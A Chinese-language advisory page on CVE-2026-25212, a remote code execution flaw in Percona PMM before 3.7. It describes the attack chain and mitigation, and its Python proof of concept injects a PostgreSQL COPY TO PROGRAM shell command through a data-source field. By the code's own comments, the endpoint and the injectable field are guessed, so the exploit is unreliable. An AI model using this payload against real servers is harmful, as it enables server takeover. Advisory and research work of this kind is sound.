CVE-2026-25212 CVSS 9.9 严重

CVE-2026-25212 Percona PMM 远程代码执行漏洞

披露日期: 2026-04-02

来源: [email protected]

漏洞信息

漏洞编号

CVE-2026-25212

漏洞类型

远程代码执行 (RCE)

CVSS评分

9.9 严重

攻击向量

网络 (AV:N)

认证要求

低权限 (PR:L)

用户交互

无需交互 (UI:N)

影响产品

Percona PMM (Percona Monitoring and Management)

漏洞概述

Percona PMM 3.7 之前版本存在严重安全漏洞。由于内部数据库用户保留了特定的超级用户权限，拥有 pmm-admin 权限的攻击者可以滥用“添加数据源”功能。这使得攻击者能够突破数据库上下文的限制，在底层操作系统上执行任意 Shell 命令，从而完全控制服务器。

技术细节

该漏洞的根本原因在于权限隔离机制失效。Percona PMM 内部使用的数据库账户被配置了过高的超级用户特权，并未受到严格的限制。攻击者只需获取较低级别的 pmm-admin 权限，即可访问管理界面。通过利用“添加数据源”功能，攻击者能够向后端数据库发送恶意构造的请求。由于后端服务以超级用户身份执行操作，攻击者可以利用数据库特定的命令执行机制（如利用 PostgreSQL 的 COPY TO PROGRAM 或 MySQL 的 UDF/SYSTEM 命令）绕过数据库沙箱限制，将恶意指令传递给底层操作系统，从而实现从数据库上下文逃逸到操作系统层，执行任意代码。

攻击链分析

STEP 1

1. 信息收集

攻击者识别出目标运行的是 Percona PMM 3.7 以前的版本。

STEP 2

2. 获取权限

攻击者获取了具有 pmm-admin 权限的账户凭据（低权限账户）。

STEP 3

3. 漏洞利用

攻击者登录管理面板，利用“Add data source”功能，构造包含恶意命令的数据源请求。

STEP 4

4. 命令执行

后端服务使用内部超级用户权限处理请求，导致恶意命令在底层操作系统上执行。

STEP 5

5. 系统控制

攻击者获得服务器 Shell 权限，可能进一步提权或横向移动。

PoC / 利用代码

⚠️ 仅供安全研究

以下代码仅用于安全研究和授权测试，未经授权使用属于违法行为。

PoC

import requests
import json

# Target URL (Example)
TARGET_URL = "http://target-pmm-server:8080"
API_ENDPOINT = f"{TARGET_URL}/v1/Management/Add"

# Attacker credentials with pmm-admin rights
AUTH = {
    "username": "attacker",
    "password": "password"
}

# Malicious payload to execute shell command via data source abuse
# Note: The specific payload depends on the underlying DB (PostgreSQL/MySQL)
# Assuming PostgreSQL for this example using COPY TO PROGRAM
payload = {
    "name": "malicious_ds",
    "address": "127.0.0.1",
    "port": 5432,
    "type": "postgresql",
    # The 'username' or 'password' field might be injectable, or a custom config field
    # Here we simulate a command injection scenario
    "custom_params": "'; COPY (SELECT '') TO PROGRAM 'touch /tmp/pwned'; --"
}

try:
    response = requests.post(API_ENDPOINT, json=payload, auth=(AUTH['username'], AUTH['password']))
    if response.status_code == 200:
        print("[+] Payload sent successfully. Check for command execution.")
    else:
        print(f"[-] Request failed with status code: {response.status_code}")
except Exception as e:
    print(f"[!] Error: {e}")

影响范围

Percona PMM < 3.7

防御指南

临时缓解措施

如果无法立即升级，请务必撤销非必要用户的 pmm-admin 权限，并监控系统的异常行为。同时，应限制对 PMM 服务器的出站连接，以防被利用作为跳板。

参考链接

快速导航: 前沿安全最新收录域名列表最新威胁情报列表最新网站排名列表最新工具资源列表最新CVE漏洞列表